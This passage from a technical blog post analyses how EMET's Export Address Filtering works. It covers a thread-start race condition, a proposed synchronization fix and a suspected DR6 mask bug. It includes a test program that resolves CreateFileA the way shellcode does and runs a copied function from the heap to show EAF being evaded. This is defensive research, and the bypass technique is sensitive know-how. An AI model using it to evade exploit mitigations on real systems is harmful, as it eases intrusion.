<span style="font-family: Verdana, sans-serif;">The same holds if I do an analogous test on newly created threads, not just the main one: there is a small window of vulnerability at the beginning of every thread, but it's very unlikely that an attacker will ever take advantage of it.</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">Here is the source code of my test application:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Walk the export table of kernel32.dll by hand and return the address of CreateFileA.
// The read of pAddresses (the AddressOfFunctions array) is exactly the access EAF watches.
DWORD getApiAddress(void)
{
    DWORD KernelImagebase, *pNames, *pAddresses, pCreateFile = 0;
    WORD *pOrdinals;
    IMAGE_DOS_HEADER *pMZ;
    IMAGE_NT_HEADERS *pPE;
    IMAGE_EXPORT_DIRECTORY *pExpDir;
    CHAR *currentName;
    KernelImagebase = (DWORD)LoadLibrary(L"Kernel32.dll");
    pMZ = (IMAGE_DOS_HEADER*)KernelImagebase;
    pPE = (IMAGE_NT_HEADERS*)(KernelImagebase + pMZ->e_lfanew);
    pExpDir = (IMAGE_EXPORT_DIRECTORY*)(KernelImagebase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    pNames = (DWORD*)(KernelImagebase + pExpDir->AddressOfNames);
    pOrdinals = (WORD*)(KernelImagebase + pExpDir->AddressOfNameOrdinals);
    pAddresses = (DWORD*)(KernelImagebase + pExpDir->AddressOfFunctions);
    for(DWORD i = 0; i < pExpDir->NumberOfNames; i++)
    {
        currentName = (CHAR*)(KernelImagebase + pNames[i]);
        if(lstrcmpA(currentName, "CreateFileA") == 0)
        {
            // the name index maps to a function index through AddressOfNameOrdinals
            pCreateFile = (DWORD)(KernelImagebase + pAddresses[pOrdinals[i]]);
            break;
        }
    }
    return pCreateFile;
}

int main(void)
{
    DWORD apiAddress;
    Sleep(2000); // this delay hides the race condition: it gives the protector thread time to run
    // print the debug registers
    CONTEXT myContext;
    memset(&myContext, 0, sizeof(myContext));
    myContext.ContextFlags = CONTEXT_ALL;
    HANDLE hThread = GetCurrentThread();
    if(!GetThreadContext(hThread, &myContext)){
        printf("cannot get thread context \n");
    }
    printf("main D0: %08x, D1: %08x, D2: %08x, D3: %08x\n",
        myContext.Dr0, myContext.Dr1, myContext.Dr2, myContext.Dr3);
    // test1: reading the export table of kernel32.dll from this executable module
    apiAddress = getApiAddress();
    printf("Test1 CreateFileA function: %08x \n", apiAddress);
    // test2: reading the export table of kernel32.dll from the heap
    // (copies the bytes of getApiAddress into a heap buffer; relies on getApiAddress
    // being laid out right before main, hence "optimizations off" in the note below)
    DWORD functionSize, pMain, pgetApiAddress;
    pMain = (DWORD)&main;
    pgetApiAddress = (DWORD)&getApiAddress;
    functionSize = pMain - pgetApiAddress;
    BYTE *shellcode = (BYTE*)malloc(functionSize);
    memcpy(shellcode, (BYTE*)pgetApiAddress, functionSize);
    __asm
    {
        mov ebx, shellcode
        call ebx
        mov apiAddress, eax
    }
    free(shellcode);
    printf("Test2 CreateFileA function: %08x \n", apiAddress);
    getchar();
    return 0;
}
</code></pre>
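<span style="font-family: Verdana, sans-serif;">The test application resolves the API by walking the export directory by hand, which is also what a shellcode has to do and is why EAF watches the AddressOfFunctions array. As an added example (mine, not the test application above and not EMET's code), here is the same resolution written as a portable, bounds-checked C parser that runs against a small export directory constructed in memory: it maps the matching name through AddressOfNameOrdinals before indexing AddressOfFunctions (the sample ordinals are deliberately not in name order, so indexing by the name's position would return the wrong function), and it recognizes a forwarded export whose "address" points back into the export directory. The image buffer, the export names, the function RVAs and the 0x100/0x200/0x400 layout constants are all constructed for the example, with RVA equal to buffer offset as in a mapped image.</span><br />

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* In-memory layout of IMAGE_EXPORT_DIRECTORY (PE spec, 40 bytes), declared here so the
 * example builds without Windows.h. */
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions;      /* RVA of uint32[NumberOfFunctions]: the array EAF guards */
    uint32_t AddressOfNames;          /* RVA of uint32[NumberOfNames]: RVAs of name strings */
    uint32_t AddressOfNameOrdinals;   /* RVA of uint16[NumberOfNames]: index into AddressOfFunctions */
} export_dir_t;

enum { EXP_MALFORMED = -1, EXP_NOT_FOUND = 0, EXP_FOUND = 1, EXP_FORWARDED = 2 };

/* Bounds-checked little-endian reads at an RVA of a mapped image (RVA == offset). */
static int rd32(const uint8_t *img, size_t len, uint64_t rva, uint32_t *out) {
    if (rva > len || len - rva < 4) return 0;
    memcpy(out, img + rva, 4); return 1;
}
static int rd16(const uint8_t *img, size_t len, uint64_t rva, uint16_t *out) {
    if (rva > len || len - rva < 2) return 0;
    memcpy(out, img + rva, 2); return 1;
}

/* Resolve an export by name the way the loader does: find the name, map its index through
 * AddressOfNameOrdinals, then index AddressOfFunctions with the result. */
int resolve_export(const uint8_t *img, size_t len, uint32_t dir_rva, uint32_t dir_size,
                   const char *name, uint32_t *rva_out) {
    export_dir_t ed;
    if (dir_rva > len || len - dir_rva < sizeof ed) return EXP_MALFORMED;
    memcpy(&ed, img + dir_rva, sizeof ed);
    for (uint32_t i = 0; i < ed.NumberOfNames; i++) {
        uint32_t name_rva, fn_rva; uint16_t idx;
        if (!rd32(img, len, (uint64_t)ed.AddressOfNames + 4ull * i, &name_rva)) return EXP_MALFORMED;
        if (name_rva >= len || !memchr(img + name_rva, 0, len - name_rva)) return EXP_MALFORMED;
        if (strcmp((const char *)img + name_rva, name) != 0) continue;
        if (!rd16(img, len, (uint64_t)ed.AddressOfNameOrdinals + 2ull * i, &idx)) return EXP_MALFORMED;
        if (idx >= ed.NumberOfFunctions) return EXP_MALFORMED;
        if (!rd32(img, len, (uint64_t)ed.AddressOfFunctions + 4ull * idx, &fn_rva)) return EXP_MALFORMED;
        *rva_out = fn_rva;
        /* An "address" that lands inside the export directory is a forwarder string, not code. */
        return (fn_rva >= dir_rva && fn_rva - dir_rva < dir_size) ? EXP_FORWARDED : EXP_FOUND;
    }
    return EXP_NOT_FOUND;
}

/* Constructed sample image (assumption: RVA == buffer offset). Names are sorted, as the
 * PE spec requires, but the ordinals are deliberately not in name order. */
#define DIR_RVA  0x100u
#define DIR_SIZE 0x200u
#define IMG_LEN  0x400u
static uint8_t g_img[IMG_LEN];

static void put32(uint32_t rva, uint32_t v) { memcpy(g_img + rva, &v, 4); }
static void put16(uint32_t rva, uint16_t v) { memcpy(g_img + rva, &v, 2); }

void build_sample_image(void) {
    const uint32_t FUNCS = 0x200, NAMES = 0x220, ORDS = 0x240, STR = 0x260;
    export_dir_t ed = {0};
    ed.Base = 1; ed.NumberOfFunctions = 3; ed.NumberOfNames = 3;
    ed.AddressOfFunctions = FUNCS; ed.AddressOfNames = NAMES; ed.AddressOfNameOrdinals = ORDS;
    memset(g_img, 0, sizeof g_img);
    memcpy(g_img + DIR_RVA, &ed, sizeof ed);
    put32(FUNCS + 0, 0x1BDE6);          /* ordinal 1: CreateFileA (constructed RVA) */
    put32(FUNCS + 4, 0x1C010);          /* ordinal 2: CloseHandle (constructed RVA) */
    put32(FUNCS + 8, STR + 0x30);       /* ordinal 3: HeapAlloc, forwarded */
    strcpy((char *)g_img + STR + 0x00, "CloseHandle");
    strcpy((char *)g_img + STR + 0x10, "CreateFileA");
    strcpy((char *)g_img + STR + 0x20, "HeapAlloc");
    strcpy((char *)g_img + STR + 0x30, "NTDLL.RtlAllocateHeap");
    put32(NAMES + 0, STR + 0x00); put32(NAMES + 4, STR + 0x10); put32(NAMES + 8, STR + 0x20);
    put16(ORDS + 0, 1); put16(ORDS + 2, 0); put16(ORDS + 4, 2);   /* ordinal - Base */
}

/* Convenience wrapper over the sample image. */
int lookup_sample(const char *name, uint32_t *rva_out) {
    build_sample_image();
    return resolve_export(g_img, sizeof g_img, DIR_RVA, DIR_SIZE, name, rva_out);
}

int main(void) {
    const char *names[] = { "CreateFileA", "CloseHandle", "HeapAlloc", "NoSuchApi" };
    for (int i = 0; i < 4; i++) {
        uint32_t rva = 0;
        int r = lookup_sample(names[i], &rva);
        printf("%-12s -> status %d, RVA 0x%x\n", names[i], r, (unsigned)rva);
    }
    return 0;
}
```

<span style="font-family: Verdana, sans-serif;">Every branch of resolve_export that dereferences an RVA checks it against the image length first, since an export directory read from an untrusted file is attacker-controlled input; the forwarder check matters because treating the RVA of "NTDLL.RtlAllocateHeap" as code would be wrong for both a loader and an analysis tool.</span><br />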
<br />
<br />
<div>
<span style="font-family: Verdana, sans-serif;">Note: when you compile this code (I used Visual Studio), you must disable all the optimizations to avoid changes to the code layout, and also remove DEP from the linker options (the copied function has to run from the heap).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">"test1" retrieves the address of the CreateFileA API from inside the executable module; "test2" does the same from the heap.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If you don't add the Sleep(2000) in the main() function, you will get this output:</span><br />
<br />
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">main D0: 00000000, D1: 00000000, D2: 00000000, D3: 00000000</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">Test1 CreateFileA function: 7649bde6</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">Test2 CreateFileA function: 7649bde6</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Notice how the debug registers are all set to zero and both tests ran successfully.</span><br />
<span style="font-family: Verdana, sans-serif;">If instead you keep the Sleep(2000) in the code, you will get:</span><br />
<br />
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">main D0: 7651fa5c, D1: 77e40204, D2: 00000000, D3: 00000000</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">Test1 CreateFileA function: 7649bde6</span></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<br /></div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<div>
<br /></div>
</div>
<span style="background-color: white; color: #222222; font-family: Verdana, sans-serif;">As you can see, the debug registers are set and the EAF protection is active, therefore the application crashes when running the second test:</span><br />
<div>
<span style="background-color: white; color: #222222; font-family: Verdana, sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4NSuXbDjqCS4AY1K3JFcKOqoFCkMK-ew_-jfB2p93h66Slt-W1EKlOxhOUFouRX5y_OLIrG6zI3U8LlTTgVcgz4tk-Fe1Ep1udYEg1rbnJHwX7lJxYKVlyD5vdjF1uoqy_P6tOepNtSk/s1600/emeteaf.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4NSuXbDjqCS4AY1K3JFcKOqoFCkMK-ew_-jfB2p93h66Slt-W1EKlOxhOUFouRX5y_OLIrG6zI3U8LlTTgVcgz4tk-Fe1Ep1udYEg1rbnJHwX7lJxYKVlyD5vdjF1uoqy_P6tOepNtSk/s1600/emeteaf.bmp" /></a></div>
<div>
<span style="background-color: white; color: #222222; font-family: Verdana, sans-serif; font-size: 13px;"><br /></span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I think that a better usage of the synchronization objects may avoid this race condition: for instance, implementing these routines using a critical section and two events would have probably been a safer alternative.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhq2SyoU5yDb4BpbKYUmLrA_Why4OW4B4dVe4lipzkOpOZ05FSV4wQftYjD76Wt6AH0rVrIAW2x7cerV6InzF-KK7oqznqGBKraJz-QgNmyrwm10BH-BQOtCMLZ-phkS_rqVleWTDjsc/s1600/race2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhq2SyoU5yDb4BpbKYUmLrA_Why4OW4B4dVe4lipzkOpOZ05FSV4wQftYjD76Wt6AH0rVrIAW2x7cerV6InzF-KK7oqznqGBKraJz-QgNmyrwm10BH-BQOtCMLZ-phkS_rqVleWTDjsc/s1600/race2.bmp" /></a></div>
<span style="font-family: Verdana, sans-serif;">In this implementation, the main thread and every additional thread that is created add themselves to the thread array (processed by the protector thread). The code that does this runs inside a critical section object: in this way, if multiple threads are created, only one at a time runs the code that adds it to the thread array. Also, a critical section is a cheap synchronization object compared to the mutex used in the EMET implementation.</span><br />
<span style="font-family: Verdana, sans-serif;">The protector thread waits on "event 1", which is an event object: it thus wastes no CPU cycles looping continuously, as the current EMET implementation does, and only wakes up and uses the CPU when a new thread is created. A new thread adds itself to the thread array and then signals "event 1", waking up the protector thread; the new thread then stops and waits for "event 2". Meanwhile, the protector thread has time to process the thread array and, because of the structure of the code, it is certain that no other thread is modifying it. Once EAF is activated, the protector thread signals "event 2" and goes back to waiting for "event 1". The signaled "event 2" wakes up the new thread, which then continues its normal execution.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This implementation has several advantages with respect to EMET's:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">The protector thread only uses resources when it has to.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Only one thread at a time modifies the thread array, which removes the need for an array in the first place: the code could just use a single variable, avoiding the arbitrary size of 256 and the rare but possible condition of the array filling up before the protector thread runs.</span></li>
<li><span style="font-family: Verdana, sans-serif;">The new thread is guaranteed to be protected when it reaches the user code, avoiding the small window of vulnerability described in EMET's implementation.</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;">I have not tested this code, but it should work and should not suffer from deadlocks. It could also be implemented in other ways, but you get the point I'm trying to make: proper synchronization makes the code cleaner, more efficient and more elegant.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
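<span style="font-family: Verdana, sans-serif;">The handshake just described can be checked in code. The following is an added example (mine, not EMET's code and not the proposal above as written): a POSIX model in which a pthread mutex stands in for the critical section and two flags guarded by that mutex, woken through a condition variable, stand in for the auto-reset "event 1" and "event 2". The protector thread records the thread ids it "arms" in place of calling SetThreadContext; the thread ids, the single pending slot and the eaf_* names are this example's own. eaf_simulate(n) spawns n threads and counts how many reach their user code already armed, which with this design is all of them.</span><br />

```c
#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_TRACKED 64

/* Shared state: a POSIX stand-in (assumption, not EMET code) for the design in the post.
 * s->lock = the critical section, ev_registered = "event 1", ev_protected = "event 2";
 * each flag is reset by its consumer, which gives it auto-reset event semantics. */
typedef struct {
    pthread_mutex_t lock;
    pthread_cond_t  cond;
    bool     ev_registered;             /* a new thread published its id */
    bool     ev_protected;              /* the protector finished with it */
    bool     shutdown;
    uint32_t pending_tid;               /* one slot replaces the 256-entry array */
    uint32_t armed[MAX_TRACKED];        /* ids "armed"; stands in for SetThreadContext */
    int      armed_count;
} eaf_state_t;

static void eaf_init(eaf_state_t *s) {
    memset(s, 0, sizeof *s);
    pthread_mutex_init(&s->lock, NULL);
    pthread_cond_init(&s->cond, NULL);
}

/* Caller holds s->lock. */
static bool eaf_is_armed(const eaf_state_t *s, uint32_t tid) {
    for (int i = 0; i < s->armed_count; i++)
        if (s->armed[i] == tid) return true;
    return false;
}

/* Protector thread: sleeps until "event 1", arms the pending thread, signals "event 2". */
static void *eaf_protector(void *arg) {
    eaf_state_t *s = arg;
    pthread_mutex_lock(&s->lock);
    for (;;) {
        while (!s->ev_registered && !s->shutdown) pthread_cond_wait(&s->cond, &s->lock);
        if (s->shutdown) break;
        if (s->armed_count < MAX_TRACKED) s->armed[s->armed_count++] = s->pending_tid;
        s->ev_registered = false;       /* consume event 1 */
        s->ev_protected  = true;        /* signal event 2 */
        pthread_cond_broadcast(&s->cond);
    }
    pthread_mutex_unlock(&s->lock);
    return NULL;
}

/* Run by every new thread before its user code. Returns whether it is armed on exit. */
static bool eaf_register_thread(eaf_state_t *s, uint32_t tid) {
    pthread_mutex_lock(&s->lock);
    /* critical section: the slot belongs to one registrant until its event 2 is consumed */
    while (s->ev_registered || s->ev_protected) pthread_cond_wait(&s->cond, &s->lock);
    s->pending_tid = tid;
    s->ev_registered = true;            /* signal event 1 */
    pthread_cond_broadcast(&s->cond);
    while (!s->ev_protected) pthread_cond_wait(&s->cond, &s->lock);   /* wait for event 2 */
    s->ev_protected = false;            /* consume event 2, release the slot */
    bool armed = eaf_is_armed(s, tid);
    pthread_cond_broadcast(&s->cond);
    pthread_mutex_unlock(&s->lock);
    return armed;
}

typedef struct { eaf_state_t *s; uint32_t tid; bool armed_at_user_code; } worker_t;

static void *worker(void *arg) {
    worker_t *w = arg;
    w->armed_at_user_code = eaf_register_thread(w->s, w->tid);
    /* user code would start here, already under protection */
    return NULL;
}

/* Spawns one protector and n workers; returns how many workers reached user code armed. */
int eaf_simulate(int n) {
    eaf_state_t s;
    pthread_t prot, th[MAX_TRACKED];
    worker_t w[MAX_TRACKED];
    if (n < 0 || n > MAX_TRACKED) return -1;
    eaf_init(&s);
    pthread_create(&prot, NULL, eaf_protector, &s);
    for (int i = 0; i < n; i++) {
        w[i].s = &s; w[i].tid = 1000u + (uint32_t)i; w[i].armed_at_user_code = false;
        pthread_create(&th[i], NULL, worker, &w[i]);
    }
    int ok = 0;
    for (int i = 0; i < n; i++) { pthread_join(th[i], NULL); ok += w[i].armed_at_user_code; }
    pthread_mutex_lock(&s.lock);
    s.shutdown = true;                  /* every registration is done; stop the protector */
    pthread_cond_broadcast(&s.cond);
    pthread_mutex_unlock(&s.lock);
    pthread_join(prot, NULL);
    pthread_mutex_destroy(&s.lock);
    pthread_cond_destroy(&s.cond);
    return ok;
}

int main(void) {
    printf("%d of 6 threads reached user code already protected\n", eaf_simulate(6));
    return 0;
}
```

<span style="font-family: Verdana, sans-serif;">The property worth noticing is that a thread cannot leave eaf_register_thread before the protector has processed it, so the window between thread creation and protection described earlier does not exist in this design; the "slot busy until event 2 is consumed" condition is what keeps a second registrant from overwriting the pending id before the first one has been released.</span><br />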
<span style="font-family: Verdana, sans-serif;">Now let's go back to the second thread: how exactly is EAF implemented? Recall that hardware breakpoints are set through the CPU debug registers.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;">EMET walks every entry in the thread list, then opens and suspends each thread in turn in order to modify its context with the SetThreadContext API.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho2Qs0vVNXWVhMnnDW4A87Ru2U6t21vSTkj4j8bA8k_MueefcC2MTc9CKxvDDsufqlJ7tit4QyyaW8SBVbpmb8SkM36nm9QqVzIwGamL0oMI2B5iQvR2K7rpGYZj-63kgJXVY0vkc4nG8/s1600/drx2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho2Qs0vVNXWVhMnnDW4A87Ru2U6t21vSTkj4j8bA8k_MueefcC2MTc9CKxvDDsufqlJ7tit4QyyaW8SBVbpmb8SkM36nm9QqVzIwGamL0oMI2B5iQvR2K7rpGYZj-63kgJXVY0vkc4nG8/s1600/drx2.bmp" /></a></div>
<div>
<div>
<span style="font-family: Verdana, sans-serif;">As you can see from the </span><span style="font-family: Verdana, sans-serif;">image above, the AddressOfFunctions fields of the Export Tables of kernel32.dll and ntdll.dll are used to fill the DR0 and DR1 registers, while some appropriate flags are </span><span style="font-family: Verdana, sans-serif;">set in DR7.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">These flags are:</span></div>
<div>
<ul>
<li><span style="font-family: Verdana, sans-serif;">L0, L1: enable breakpoints 0 and 1 as local breakpoints (meaning that they only work in the current thread);</span></li>
<li><span style="font-family: Verdana, sans-serif;">LE: kept for backward compatibility reasons;</span></li>
<li><span style="font-family: Verdana, sans-serif;">R/W0, R/W1: indicate whether the breakpoint triggers on read, write or execute operations;</span></li>
<li><span style="font-family: Verdana, sans-serif;">LEN0, LEN1: specify the size of the data on which the breakpoint acts.</span></li>
</ul>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"></span><br />
<div>
<span style="font-family: Verdana, sans-serif;">In short: L0, L1, LE are set to 1 (which means that these flags are enabled); R/W0, R/W1 are set to 11 (which means that a breakpoint is set on data reads or writes); LEN0, LEN1 are set to 11 (referring to 4-byte-long breakpoints).</span><br />
<span style="font-family: Verdana, sans-serif;">When these modifications are done, the thread is resumed and the EAF protection becomes active.</span></div>
<div style="font-family: Verdana, sans-serif;">
<br />
If you are interested in digging into the debug registers and how Windows handles them, I suggest you read <a href="http://www.alex-ionescu.com/?p=17">this article</a> by Alex Ionescu.<br />
<br /></div>
<div>
<div style="font-family: Verdana, sans-serif;">
At this point our description is almost complete; the only missing piece is the function installed as an Exception Handler. Let's briefly recall that a function passed as an Exception Handler must have the following prototype:</div>
<pre style="font-family: Consolas, Courier, monospace; font-size: 14px; line-height: 20px; overflow: auto; padding: 5px; word-wrap: normal;">LONG CALLBACK VectoredHandler(
_In_ PEXCEPTION_POINTERS ExceptionInfo
);
</pre>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
In particular, EMET accesses ExceptionInfo->ExceptionRecord->ExceptionFlags to filter the exception itself, making sure that it's a Single Step one (do remember that when a hardware breakpoint is hit the generated exception is of type Single Step). If it is, EMET disables all the active hardware breakpoints (that is, it sets the L0, L1 flags in DR7 to zero). </div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
Then, it reads the context at the time the exception happened through ExceptionInfo->ContextRecord, and checks the four lowest bits in DR6 (B0 to B3): these bits indicate that a hardware breakpoint condition was met when a Single Step exception was raised (to distinguish it from the ones being generated when the Trap Flag is set).</div>
<div style="font-family: Verdana, sans-serif;">
However, I'm quite sure that there's a little bug in this check:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="background-color: white;">
<span style="color: magenta; font-family: Courier New, Courier, monospace;">.text:000546C4 test byte ptr [eax+CONTEXT.Dr6], 11h ; bug! 11h should be 3</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546C8 jz short not_handled</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546CA push [eax+CONTEXT._Eip] ; reg_eip</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D0 call is_in_module</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D5 test eax, eax</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D7 jnz short not_handled</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546D9 push edi</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546DA push 1</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546DC call report_protection</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546E1 cmp status_exploitaction, 1</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546E8 pop ecx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546E9 pop ecx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546EA jnz short not_handled</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546EC push 1</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546EE push STATUS_STACK_BUFFER_OVERRUN</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546F3 push dword ptr [edi+4]</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546F6 call report_error_and_terminate</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:000546FB not_handled:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div>
<br />
<br /></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;">In fact, EMET tests DR6 against 11 hex, which is 10001 in binary, corresponding to B0 and the undocumented fifth bit (bit 4) that, according to Intel's manuals, is always set to 1. I believe that this is a typo, and that the correct mask to be tested was 11 in binary (that is, 3 hex), covering both B0 and B1. </span><br />
<span style="font-family: Verdana, sans-serif;">This is not a serious issue, because a breakpoint hit on DR1 passes the test anyway (the always-set bit makes the TEST succeed), but it is pointless to let EMET handle a breakpoint that is not actually set. </span><br />
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">If one of the two hardware breakpoints was hit when the exception occurred, which may always appear to be the case because of the buggy TEST instruction, EMET checks the value of the EIP register at that time (through ExceptionInfo->ContextRecord->Eip) to verify (using GetModuleHandleEx) whether the instruction that caused the Single Step exception belonged to an executable module. If it didn't, the event is logged and, if "status_exploitaction" is set (this variable corresponds to the "Stop on exploit/Audit only" option available from EMET's settings panel), a STATUS_STACK_BUFFER_OVERRUN is reported (through ExceptionInfo->ExceptionRecord->ExceptionCode), the exception is left unhandled and the process is terminated. In all the other cases (that is, if neither of the two bits in DR6 is set, if the instruction reported in EIP did belong to an executable module, or if "status_exploitaction" isn't set) EMET clears all the bits in DR6 and activates the L0 and L1 flags in DR7 again to let execution resume as if nothing had happened.</span></div>
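<div>
<span style="font-family: Verdana, sans-serif;">To make the bit layout concrete, here is an added example (mine, not code from the post or from EMET) that builds the DR7 value described above, decodes it back, and compares the DR6 test as shipped (11h) with the intended one (3) on constructed register values; the DR6 reset value 0xFFFF0FF0, with reserved bits reading as 1, is taken from the Intel SDM, and the handler outcomes follow the listing above.</span></div>

```c
/*
 * Added example, not code from the original post or from EMET: it models the
 * DR7 value the post says EMET writes with SetThreadContext and the DR6 test
 * performed at .text:000546C4, so the effect of the 11h-vs-3 mask can be seen
 * on sample register values. Bit layouts follow the Intel SDM; 0xFFFF0FF0 is
 * the documented DR6 reset value (reserved bits read as 1).
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* DR7 fields */
#define DR7_L(n)       (1u << (2 * (n)))                 /* Ln: local enable   */
#define DR7_LE         (1u << 8)                         /* legacy exact bit   */
#define DR7_RW(n, v)   ((uint32_t)(v) << (16 + 4 * (n))) /* R/Wn, 2 bits       */
#define DR7_LEN(n, v)  ((uint32_t)(v) << (18 + 4 * (n))) /* LENn, 2 bits       */
#define RW_DATA_RW     3u   /* 11b: break on data reads or writes */
#define LEN_4_BYTES    3u   /* 11b: 4-byte wide breakpoint        */

/* DR6 fields */
#define DR6_B(n)       (1u << (n))    /* Bn: breakpoint n condition met  */
#define DR6_BS         (1u << 14)     /* BS: single step via TF          */
#define DR6_RESERVED   0xFFFF0FF0u    /* reserved bits, read as 1 (SDM)  */

/* The DR7 EMET builds: L0, L1, LE set; R/W0 = R/W1 = 11b; LEN0 = LEN1 = 11b. */
uint32_t eaf_dr7(void)
{
    return DR7_L(0) | DR7_L(1) | DR7_LE
         | DR7_RW(0, RW_DATA_RW) | DR7_LEN(0, LEN_4_BYTES)
         | DR7_RW(1, RW_DATA_RW) | DR7_LEN(1, LEN_4_BYTES);
}

/* Decode fields back out of a DR7 value (what an analyst would dump). */
bool dr7_local_enabled(uint32_t dr7, int n) { return (dr7 >> (2 * n)) & 1u; }
unsigned dr7_rw(uint32_t dr7, int n)        { return (dr7 >> (16 + 4 * n)) & 3u; }
unsigned dr7_len_bytes(uint32_t dr7, int n)
{
    static const unsigned widths[4] = { 1, 2, 8, 4 }; /* LEN = 00, 01, 10, 11 */
    return widths[(dr7 >> (18 + 4 * n)) & 3u];
}

/* The two versions of the DR6 test: as shipped (11h) and as the post argues
 * it was meant to be (3 = B0 | B1). */
bool dr6_hit_as_shipped(uint32_t dr6) { return (dr6 & 0x11u) != 0; }
bool dr6_hit_intended(uint32_t dr6)   { return (dr6 & (DR6_B(0) | DR6_B(1))) != 0; }

/* Outcome of the handler logic at .text:000546C4..000546FB. */
enum eaf_action { EAF_RESUME = 0, EAF_AUDIT_ONLY = 1, EAF_TERMINATE = 2 };

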